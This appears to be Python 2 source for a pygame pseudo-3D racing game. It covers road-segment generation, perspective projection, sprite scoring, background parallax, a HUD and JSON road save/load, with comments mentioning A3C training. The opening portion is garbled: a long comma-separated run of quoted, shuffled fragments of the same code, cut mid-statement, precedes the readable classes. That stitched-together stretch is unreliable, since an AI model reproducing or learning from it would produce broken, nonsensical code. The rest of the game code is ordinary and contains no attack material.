r_events.append(event) elif event.type == self.pglc.KEYDOWN:", "self.player_x xc2 = (rad - xx2) - self.player_x xc3 =", "self.speed > self.speed_max: self.speed = self.speed_max self.position += self.speed if", "# for test if i < 10: print '>>> ',", "= (xsr1 + xsl1) / 2.0 #x_sprt = random.choice(x_pos) x_i", "xx1) - self.player_x xc2 = (rad - xx2) - self.player_x", "self.speed_dt_up elif self.player_go == 2: self.speed -= self.speed_dt_dn else: self.speed", "self.player_di = 1 elif 3 in e_keys_dn: self.player_di = 3", "theta1 = theta_i * i theta2 = theta_i * (i", "'w': 80, 'h': 56 }, 'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y':", "== 3: # < self.player_x -= 9 if self.player_x <", "100 }, # num segments 'CURVE': {'NONE': 0, 'EASY': 2,", "0.9 #theta_i = 0.0 xc1 = self.road_w / 2 -", "= 0.3#0.15# def rd_reset(self, init=False, keep_segs=False, segs_file=None): #if not init", "b, percent): return a + (b - a) * (1", "xx1 = rad1 * math.cos(engi * i) xx2 = rad2", "xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1, self.d, zc1) ys1", "30 ''' # grass self.render_polygon(None, 0, ys1, self.w, ys2, self.w,", "x_i_saved: # info['x_i'] = x_i # x_i_saved = x_i obj.rect.top", "if 1:#i % 2 == 1: xpl1 = self.xc_to_xp(xcl1, self.d,", "/ rad #a *= 10.0 #print a s = 1.0", "xcr1 - x_curve xcr2 = xcr2 - x_curve xcr3 =", "x_pos, x_i, y_sprt, scale_sprt) if obj: self.rd_sprt_cache.append(obj) # render the", "456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16)", "'PALM_TREE': { 'x': 5, 'y': 5, 'w': 215, 'h': 540", "def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i", "grass, slow down if self.player_x < -self.road_w / 2 or", "+= self.speed_dt_up elif self.player_go == 2: self.speed -= self.speed_dt_dn else:", "< 0: hill.rect.left += hill.rect.width * 2 if hill.rect.left -", "fi.read() segs = utils.json_loads(s) return segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1", "self.c_bg = c_bg self.c_prog = c_prog self.progress(0.0) def progress(self, prog):", "60 }, } FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score':", "yc_to_yp(self, yc, d, zc): if zc == 0.0: #yp =", "str(seg['index']) + '_' + str(i) + '_' + sprt obj", "a = -1.0 elif a > 1.0: a = 1.0", "2 elif k == self.pglc.K_d: return 3 else: return None", "def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file)", "def check_player_di(self, e_keys_dn, e_keys_up): if 0 in e_keys_dn: self.player_go =", "(self.position % self.seg_len) zc2 = zw2 - self.camera_z - (self.position", "rad_m = 10.0#50.0# x += rad_m * math.cos(tht) y +=", "'#CCCCCC'}, } FP_ROAD = { 'LENGTH': {'NONE': 0, 'SHORT': 25,", "def xy_to_cntr(self, x, y): return [self.size[0] / 2 + x,", "self.yp_to_ys(yp3, self.h) ys4 = ys3 self.render_polygon(None, 0, ys1, self.w, ys2,", "170 }, 'DEAD_TREE2': { 'x': 1205, 'y': 490, 'w': 150,", "print 'world z', seg['p1']['world']['z'] print 'world y', seg['p1']['world'].get('y', 0.0) #print", "= len(self.segments) if seg_n == 0: return #self.segments[0]['color'] = FP_COLORS['START_Y']", "math import random import time from starfish import pygm from", "self.disp_add(self.tm_once) self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left", ": replay this road * RETURN : go to a", "/ 2.0 + w / 2.0 * xp xs =", "1,}, 'coin5': {'imgs': 
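
# --- illustrative sketch (not part of the game) ----------------------------
# The projection in FPSptRoadB is the classic pseudo-3D pipeline: a point in
# camera space is scaled by d / zc (projection-plane distance over depth) and
# shifted into screen coordinates. The same arithmetic, stripped down, with
# the constants the class uses (d=200, camera_h=500); the function name is
# hypothetical:
def _project_demo(xc, yc, zc, d=200.0, w=640.0, h=480.0):
    """Map a camera-space point (xc, yc, zc) to screen (xs, ys)."""
    scale = d / zc            # zc must be > 0: in front of the camera
    xs = w / 2.0 + xc * scale
    ys = h / 2.0 - yc * scale
    return xs, ys

# A road edge 1200 units right of the camera, 500 below the eye, 1500 deep,
# lands at roughly (480.0, 173.3):
# _project_demo(1200.0, 500.0, 1500.0)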
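
# --- illustrative sketch (not part of the game) ----------------------------
# add_road() shapes a bend in three phases: 'enter' eases the per-segment
# curve value in, 'hold' keeps it constant, 'leave' eases it back to zero.
# The resulting per-segment profile can be rehearsed without any game state
# (hypothetical helper, same easing formulas as util_ease_in/util_ease_out):
def _road_curve_profile_demo(enter, hold, leave, curve):
    ease_in = lambda a, b, p: a + (b - a) * math.pow(p, 2)
    ease_out = lambda a, b, p: a + (b - a) * (1 - math.pow(1 - p, 2))
    vals = []
    for n in range(enter):
        vals.append(ease_in(0, curve, float(n) / enter))
    for n in range(hold):
        vals.append(curve)
    for n in range(leave):
        vals.append(ease_out(curve, 0, float(n) / leave))
    return vals

# _road_curve_profile_demo(4, 2, 4, 4.0)
# -> [0.0, 0.25, 1.0, 2.25, 4.0, 4.0, 4.0, 2.25, 1.0, 0.25]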
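
# --- illustrative sketch (not part of the game) ----------------------------
# The track is a ring: get_seg_base_i() maps the car position to a segment
# index modulo the segment count, and util_limit() wraps any value into
# [0, mx). The same wrap logic, rehearsed standalone:
def _wrap_demo(start, increment, mx):
    result = start + increment
    while result >= mx:
        result -= mx
    while result < 0:
        result += mx
    return result

# With 300 segments of length 200 the track is 60000 long; a position of
# 59950 plus an increment of 300 wraps back to 250:
# _wrap_demo(59950, 300, 60000)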

class FPStraight(pygm.PyGMSprite):
    """The full playfield: background layers, the road, the car, the HUD."""

    def __init__(self, cfg, *args, **kwargs):
        super(FPStraight, self).__init__()
        self.cfg = cfg
        self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])
        self.bg_sky1.rect.top = 0
        self.bg_sky1.rect.left = 0
        self.disp_add(self.bg_sky1)
        self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])
        self.bg_sky2.rect.top = 0
        self.bg_sky2.rect.left = self.bg_sky1.rect.width
        self.disp_add(self.bg_sky2)
        self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])
        self.bg_hills1.rect.top = 0
        self.bg_hills1.rect.left = 0
        self.disp_add(self.bg_hills1)
        self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])
        self.bg_hills2.rect.top = 0
        self.bg_hills2.rect.left = self.bg_hills1.rect.width
        self.disp_add(self.bg_hills2)
        self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])
        self.bg_trees1.rect.top = 0
        self.bg_trees1.rect.left = 0
        self.disp_add(self.bg_trees1)
        self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])
        self.bg_trees2.rect.top = 0
        self.bg_trees2.rect.left = self.bg_trees1.rect.width
        self.disp_add(self.bg_trees2)
        self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT'])
        self.car.scale(2)
        self.car.rect.top = 400
        self.car.rect.left = (640 - self.car.rect.width) / 2
        # car disp add after road
        self.road = FPSptRoadB((640, 240), {}, car=self.car,
                               bg_sky=[self.bg_sky1, self.bg_sky2],
                               bg_hills=[self.bg_hills1, self.bg_hills2],
                               bg_trees=[self.bg_trees1, self.bg_trees2])
        self.road.rect.top = 240
        self.road.rect.left = 0
        self.disp_add(self.road)
        self.disp_add(self.car)
        self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len)
        self.rdmap.rect.top = 0
        self.rdmap.rect.left = 80
        self.rdmap.rotate(90)
        self.disp_add(self.rdmap)
        self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12)
        self.rdpsd.rect.top = 456
        self.rdpsd.rect.left = 312
        self.disp_add(self.rdpsd)
        self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16)
        self.scr.rect.top = 40
        self.scr.rect.left = 600
        self.disp_add(self.scr)
        self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16)
        self.tm_once.rect.top = 20
        self.tm_once.rect.left = 600
        self.disp_add(self.tm_once)
        self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW)
        self.prog.rect.top = 70
        self.prog.rect.left = 596
        self.disp_add(self.prog)
        self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN)
        self.spd.rect.top = 70
        self.spd.rect.left = 602
        self.disp_add(self.spd)

    def rdmap_hide(self):
        self.rdmap.hide()

    def rdmap_reset(self):
        self.rdmap.clear()
        self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len)
        self.rdmap.rotate(90)

    def road_reset(self):
        self.road.rd_reset()
        self.rdmap_reset()

    def road_reset_keep_segs(self):
        self.road.rd_reset(init=False, keep_segs=True)

    def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'):
        segs_file = utils.dir_abs(segs_file, __file__)
        self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file)
        self.rdmap_reset()

    def road_segs_to_file(self, segs_file=None):
        if not segs_file:
            segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt'
        segs_file = utils.dir_abs(segs_file, __file__)
        self.road.rd_seg_json_save(segs_file)

    def handle_event(self, events, *args, **kwargs):
        r_events = []
        for event in events:
            if event.type == self.pglc.KEYUP:
                k = event.key
                if k == self.pglc.K_SPACE:
                    # hide / show road map
                    self.rdmap_hide()
                elif k == self.pglc.K_RETURN:
                    self.road_reset()
                elif k == self.pglc.K_TAB:
                    self.road_reset_keep_segs()
                elif k == self.pglc.K_BACKSPACE:
                    self.road_reset_from_file()
                elif k == self.pglc.K_SLASH:
                    self.road_segs_to_file()
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                r_events.append(event)
            else:
                r_events.append(event)
        return r_events

    def refresh(self, fps_clock, *args, **kwargs):
        self.rdpsd.lbl_set(str(int(self.road.speed)))
        self.scr.lbl_set(str(int(self.road.score)))
        self.tm_once.lbl_set(str(int(self.road.tm_last_once)))
        prg = self.road.position / self.road.track_len
        self.prog.progress(prg)
        spdc = self.road.speed / self.road.speed_max
        self.spd.progress(spdc)
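
# --- illustrative sketch (not part of the game) ----------------------------
# Roads persist as JSON: rd_seg_get_cleared() strips the live sprite objects
# (the 'obj' fields) so the segment list serializes, utils.json_dumps writes
# it, and a reloaded road re-creates its sprites lazily at render time. A
# hypothetical round-trip on top of the two FPStraight helpers above:
def _road_roundtrip_demo(straight, path='sr_roads/sr_road_demo.txt'):
    """Save the current road, then immediately reload it from disk."""
    straight.road_segs_to_file(path)
    straight.road_reset_from_file(path)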
}, 'PLAYER_UPHILL_LEFT':", "- (b_curve * b_percent) x_curve = 0 #print 'b_curve', b_curve", "fps_clock, *args, **kwargs): pass class GMFlatpath(pygm.PyGMGame): def __init__(self, title, winw,", "961, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295,", "p in pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf,", "#zc1 = self.position - (zw1 - self.camera_z) #zc2 = self.position", "= SptTmpx((200, 200)) self.sn1.rect.top = 100 self.sn1.rect.left = 100 self.disp_add(self.sn1)", "}, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018, 'w': 80, 'h':", "+ '.txt' segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file) def handle_event(self, events,", "zc2 = zw2 - self.camera_z - self.position #zc1 = self.position", "'h': 170 }, 'BILLBOARD06': { 'x': 488, 'y': 555, 'w':", "# for curve xc1 = xc1 - x_curve xc2 =", "{'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,}, 'pot1':", "#self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file:", "self.rd_sprt_objs[obj_k] = obj # for reset to delete all #", "check score self.last_seg_i = 0 self.game_over = True self.game_score =", "-= 1#self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left +=", "font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left = 600 self.disp_add(self.tm_once) self.prog =", "0.2#0.1# self.tree_speed = 0.3#0.15# def rd_reset(self, init=False, keep_segs=False, segs_file=None): #if", "self.speed -= self.speed_dt_dn else: self.speed -= self.speed_dt_na # if on", "= len(self.segments) if n is None: #n = seg_n /", "zw2 = (i+2)*self.seg_len zc1 = zw1 - self.camera_z - (self.position", "y = self.size[1] * prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, # [1,", "p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else:", "self.speed * p_curve * self.centrifugal #p_dt = 40 #p_dt =", "'curve', seg.get('curve', 0.0) print 'world z', seg['p1']['world']['z'] print 'world y',", "'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear the sprites cache self.rd_sprt_cache", "self.zc = 0.0 ## self.xp = 0.0 self.yp = 0.0", "0 def update_world(self): if self.player_go == 1: self.speed += self.speed_dt_up", "i) xx2 = rad2 * math.cos(engi * i) xx3 =", "total): return (n % total) / total def add_road(self, enter,", "zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len else: # <1> zw1", "curve = rl * random.random() * 6.0 yw = 0.0", "-self.road_w / 2 - self.player_x xcl1 = xc1 - self.lane_w", "random.randint(2, 10) if self.position > self.track_len: self.position -= self.track_len #'''", "[x4, y4], [x1, y1]] #pnts = [[x1, y1-d], [x2, y2-d],", "self.e_keys_up = e_keys_up self.e_keys_dn = e_keys_dn return r_events def refresh__1(self,", "[] self.rd_sprt_objs = {} self.rd_sprt_cache = [] # for sprites", "= [] for event in events: #print event if event.type", "= 0 self.game_over = False self.game_score = 0.0 self.tm_start =", "0, height/2.0) self.add_road(num, num, num, 0, -height) self.add_road(num, num, num,", "< 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM']) elif p", "self.check_score() self.check_tm() self.update_bg() def check_player_di(self, e_keys_dn, e_keys_up): if 0 in", "self.tm_once = 
pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left =", "self.segments else: segs = self.segments[:-self.seg_draw_n] return segs # #### geometry", "segbi = self.get_seg_base_i() print 'segbi', segbi self.player_seg = self.segments[segbi] b_curve", "1280, 'h': 480 }, 'TREES': { 'x': 5, 'y': 985,", "str(i) + '_' + sprt obj = info.get('obj') ''' #", "0.0 #self.tm_end = 0.0 def update_bg(self): # always move the", "0.0 else: rad_m = 0.5#1.0#0.1# else: if cv_s: cv_l +=", "in self.rd_sprt_objs.items(): #print k, sprt self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self,", "move the cloud for sky in self.bg_sky: sky.rect.left -= 1#self.sky_speed", "self.w, ys4, 0, ys3, seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2, ys2,", "not keep_segs: if not init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if segs_file is", "'h': 360 }, 'DEAD_TREE1': { 'x': 5, 'y': 555, 'w':", "to up self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] - y, self.size[0] -", "'y': 1097, 'w': 232, 'h': 152 }, 'BILLBOARD03': { 'x':", "self.pglc.K_n: return 2 elif k == self.pglc.K_d: return 3 else:", "self.h) ys4 = ys3 self.render_polygon(None, 0, ys1, self.w, ys2, self.w,", "*args, **kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def draw_on(self, *args, **kwargs): self.fill(consts.GREEN)", "-100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score':", "range(n): p = random.random() #print p rl = random.choice([1, -1])", "+= dx1 xs3 += dx2 #+ dx1 xs4 += dx2", "return obj = sprt.get('obj') if not obj: # None or", "= 100 self.sn1.rect.left = 100 self.disp_add(self.sn1) ''' ''' self.lb1 =", "1205, 'y': 760, 'w': 168, 'h': 248 }, 'BUSH1': {", "= x_i obj.rect.top = 116 - y + 240 -", "'#72D7EE', 'TREE': '#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10',", "= start_y + (int(yw) * self.seg_len) total = enter +", "= rad1 * math.cos(engi * i) xx2 = rad2 *", "size, c=[0, 81, 8, 0], h=30, *args, **kwargs): super(FPSptFog, self).__init__(size)", "self.d, zc1) xsr1 = self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d,", "}, 'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH': {'road':", "0 self.bg_trees1.rect.left = 0 self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top", "[x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]] #pnts =", "self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left", "return # NOTE: here we should use the segment just", "leave, 0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n for", "obj: self.rd_sprt_cache.append(obj) # render the sprites with right order for", "- x_curve xcr2 = xcr2 - x_curve xcr3 = xcr3", "(i + 1)) xx4 = rad2 * math.cos(engi * (i", "= 0 cv_l = 0.0 pnts.append([x, y]) for seg in", "increment, mx): # with looping result = start + increment", "n, total): return (n % total) / total def add_road(self,", "ys4 = ys3 ''' #if 1: #if i < self.seg_draw_n", "== 1: self.player_x += 19 if self.player_x > 1000: self.player_di", "= (rad - xx4) - self.player_x xp1 = self.xc_to_xp(xc1, self.d,", "= utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = 
FP_COLOR_WHITE = '#FFFFFF'
FP_COLOR_BLACK = '#000000'
FP_COLOR_YELLOW = '#EEEE00'
FP_COLOR_BLUE = '#00EEEE'

FP_COLORS = {
    'SKY': '#72D7EE',
    'TREE': '#005108',
    'FOG': '#005108',
    'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'},
    'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB'},
    'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE},
    'START_Y': {'road': FP_COLOR_YELLOW, 'grass': FP_COLOR_YELLOW, 'rumble': FP_COLOR_YELLOW},
    'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK},
}

FP_ROAD = {
    # num segments
    'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100},
    'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6},
    'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60},
}

FP_ROAD_SPRTS = {
    'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,},
    'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,},
    'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,},
    'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,},
    'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,},
    'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,},
    'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,},
    'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,},
    'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,},
    'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,},
    'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,},
    #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,},
    #'bear': {'imgs': ['img_sprts/bear2.png'], ...},
    #'dinof': {'imgs': ['img_sprts/dinof2.png'], ...},
    'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,},
}
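
# --- sketch: what utils.clr_from_str presumably does with the '#RRGGBB'
# strings above (the real starfish helper may differ):
def _demo_clr_from_str(s):
    s = s.lstrip('#')
    return tuple(int(s[i:i + 2], 16) for i in (0, 2, 4))

#print _demo_clr_from_str(FP_COLORS['SKY'])  # (114, 215, 238)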
class SptTmpx(sptdraw.SptDrawBase):
    def __init__(self, size, *args, **kwargs):
        super(SptTmpx, self).__init__(size)
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        self.fill(consts.GREEN)
        self.pygm.draw.circle(self.surf, consts.WHITE,
                              (self.size[0] / 2, self.size[1] / 2),
                              self.size[0] / 2, 0)


class SptTmpi(pygm.SptImg):
    def __init__(self, img_file, *args, **kwargs):
        super(SptTmpi, self).__init__(img_file)


class FPSptBg(pygm.SptImgOne):
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptBg, self).__init__(img_file, pos)


class FPSptSprts(pygm.SptImgOne):
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptSprts, self).__init__(img_file, pos)


class FPSptRdSprts(pygm.SptImg):
    def __init__(self, img_file, *args, **kwargs):
        super(FPSptRdSprts, self).__init__(img_file)

    @classmethod
    def create_by_img(cls, img):
        return cls(img)


class FPSptFog(sptdraw.SptDrawBase):
    def __init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs):
        super(FPSptFog, self).__init__(size)
        self.c = c
        self.h = h
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        #self.fill(self.c)
        d = 2
        n = self.h / d
        for i in range(n):
            rct = [0, i * d, self.size[0], d]
            # fade the alpha out band by band
            #ca = 255 / n * (n - i)
            ca = 200 / n * (n - i)
            self.c[3] = ca
            self.pygm.draw.rect(self.surf, self.c, rct)


class FPSptProgress(sptdraw.SptDrawBase):
    def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN, *args, **kwargs):
        super(FPSptProgress, self).__init__(size)
        self.c_bg = c_bg
        self.c_prog = c_prog
        self.progress(0.0)

    def progress(self, prog):
        y = self.size[1] * prog
        self.fill(self.c_bg)
        #self.pygm.draw.rect(self.surf, consts.GREEN,
        #                    [1, 0, self.size[0] - 2, y])
        # from down to up
        self.pygm.draw.rect(self.surf, self.c_prog,
                            [1, self.size[1] - y, self.size[0] - 2, y])
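
# --- worked numbers for the FPSptFog alpha ramp above; a sketch, using //
# to match the Python 2 integer division in draw_on:
def _demo_fog_alphas(h=30, d=2):
    n = h // d
    return [200 // n * (n - i) for i in range(n)]

#print _demo_fog_alphas()  # [195, 182, 169, ..., 13]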
class FPSptRoadB(sptdraw.SptDrawBase):
    def __init__(self, size, cfg, *args, **kwargs):
        super(FPSptRoadB, self).__init__(size)
        self.cfg = cfg
        self.car = kwargs.get('car')
        self.bg_sky = kwargs.get('bg_sky')
        self.bg_hills = kwargs.get('bg_hills')
        self.bg_trees = kwargs.get('bg_trees')
        self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road'])
        self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass'])
        self.rd_reset(init=True)
        self.add_fog()

    def draw_on(self, *args, **kwargs):
        self.fill(self.clr_dark_grass)

    def add_fog(self):
        self.fog = FPSptFog(self.size)
        self.fog.rect.top = 240
        self.fog.rect.left = 0
        self.disp_add(self.fog)

    def prms_reset(self, keep_segs=False):
        self.flag_check_event = True
        self.e_keys_up = []
        self.e_keys_dn = []
        self.camera_x = 0.0
        self.camera_y = 0.0
        self.camera_z = 0.0
        self.xc = 0.0
        self.yc = 0.0
        self.zc = 0.0
        ##
        self.xp = 0.0
        self.yp = 0.0
        self.xs = 0.0
        self.ys = 0.0
        self.d = 200.0#100.0#10.0#30.0#1.0
        self.w = self.size[0]
        self.h = self.size[1]
        if not keep_segs:
            self.segments = []
        self.rd_sprt_objs = {}
        self.rd_sprt_cache = []  # for sprites render order
        self.track_len = 0.0
        self.seg_len = 200.0#100.0#20.0#60.0#200.0#
        self.road_w = 2400#2000#600.0#200.0#1000.0#200#
        self.camera_h = 500.0#1000.0#
        self.speed_max = 300.0#180.0#200.0#100.0
        self.lane_w = 60
        self.seg_n = 300#200
        #self.seg_draw_n = 200#150
        self.seg_draw_n = 70#100#200#150
        self.speed = 0.0
        self.position = 0.0
        self.player_x = 0.0
        self.player_x_dt = 60.0#30.0#20.0
        self.last_seg_i = 0
        self.score = 0
        self.game_over = False
        self.game_score = 0.0
        self.tm_start = 0.0
        self.tm_end = 0.0
        self.tm_last_once = 0.0
        self.player_seg = None
        self.base_seg = None  # the segment just under the car
        self.player_di = 0  # 0:^ 1:> 2:v 3:<
        self.player_go = 0  # 0:- 1:^ 2:v
        self.speed_dt_up = 2.0#1.0#
        self.speed_dt_dn = 4.0#2.0#
        self.speed_dt_na = 1.0#0.5#
        self.centrifugal = 0.3#0.5#
        self.sky_speed = 0.1#0.05#
        self.hill_speed = 0.2#0.1#
        self.tree_speed = 0.3#0.15#

    def rd_reset(self, init=False, keep_segs=False, segs_file=None):
        #if not keep_segs:
        if not init:
            self.rd_sprts_del_all_objs()
        self.prms_reset(keep_segs=keep_segs)
        if segs_file is not None:
            try:
                segs = self.rd_seg_json_load(segs_file)
                self.segments = segs
                self.track_len = len(self.segments) * self.seg_len
            except Exception as e:
                print e
                self.init_rd_segs_rand_1()
        else:
            if not keep_segs:
                self.init_rd_segs_rand_1()
        self.draw_on()
        self.rd_seg_render()

    def init_rd_segs_rand_1(self):
        #self.rd_seg_init(self.seg_n)
        self.rd_seg_init_rand_curve()
        #self.add_curves()
        #self.add_low_rolling_hills(20, 2.0)
        ##self.add_low_rolling_hills(30, 4.0)
        #self.rd_seg_init_rand(10)#50#10#3#1
        #segnrand = random.randint(3, 30)
        segnrand = random.randint(2, 6)  # for a3c train
        self.rd_seg_init_rand(segnrand)
        # for segment draw
        #self.rd_seg_init(self.seg_draw_n)
        #self.rd_seg_init(100)#20#500#2#10#4#1#100#200
        self.rd_seg_init(10)  # for a3c train
        self.rd_start_seg_init()
        self.rd_sprts_init_rand()

    # #### segments ####
    def seg_lasy_y(self):
        seg_n = len(self.segments)
        if seg_n == 0:
            return 0.0
        return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0)

    def rd_seg_init(self, a=500):
        for n in range(a):
            self.rd_seg_add(0.0, 0.0)

    def rd_seg_add(self, curve=0.0, yw=0.0):
        #print '+', curve, yw
        n = len(self.segments)
        #print n
        if n % 2 == 0:
            c = FP_COLORS['LIGHT']
            #c = {'road': FP_COLOR_WHITE}
        else:
            c = FP_COLORS['DARK']
            #c = {'road': FP_COLOR_BLACK}
        seg = {
            'index': n,
            'p1': {'world': {'z': (n + 1) * self.seg_len, 'y': self.seg_lasy_y()},
                   'camera': {}, 'screen': {}},
            'p2': {'world': {'z': (n + 2) * self.seg_len, 'y': yw},
                   'camera': {}, 'screen': {}},
            'curve': curve,
            'color': c,
            'sprites': [],
            'looped': 0,
        }
        self.segments.append(seg)
        self.track_len = len(self.segments) * self.seg_len
        #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len

    def rd_seg_init_rand(self, n=50):
        #print 'rd_seg_init_rand', n
        for i in range(n):
            p = random.random()
            #print p
            rl = random.choice([1, -1])
            if p < 0.35:
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM'])
            elif p < 0.7:
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY'])
            else:
                enter = random.randint(10, 100)
                hold = random.randint(10, 100)
                leave = random.randint(10, 100)
                self.add_road(enter, hold, leave, 0.0, 0.0)

    def rd_seg_init_rand_2(self, n=50):
        for i in range(n):
            rl = random.choice([1, -1])
            enter = random.randint(10, 40)
            hold = random.randint(10, 40)
            leave = random.randint(10, 40)
            curve = rl * random.random() * 8.0
            yw = 0.0
            self.add_road(enter, hold, leave, curve, yw)

    def rd_seg_init_rand_curve(self, n=5):
        #print 'rd_seg_init_rand', n
        for i in range(n):
            p = random.random()
            rl = random.choice([1, -1])
            enter = random.randint(10, 40)
            hold = random.randint(10, 40)
            leave = random.randint(10, 40)
            if p < 0.5:
                curve = rl * random.random() * 10.0
            else:
                curve = rl * random.random() * 6.0
            yw = 0.0
            #elif p < 0.8:
            #    curve = rl * random.random() * 8.0
            self.add_road(enter, hold, leave, curve, yw)

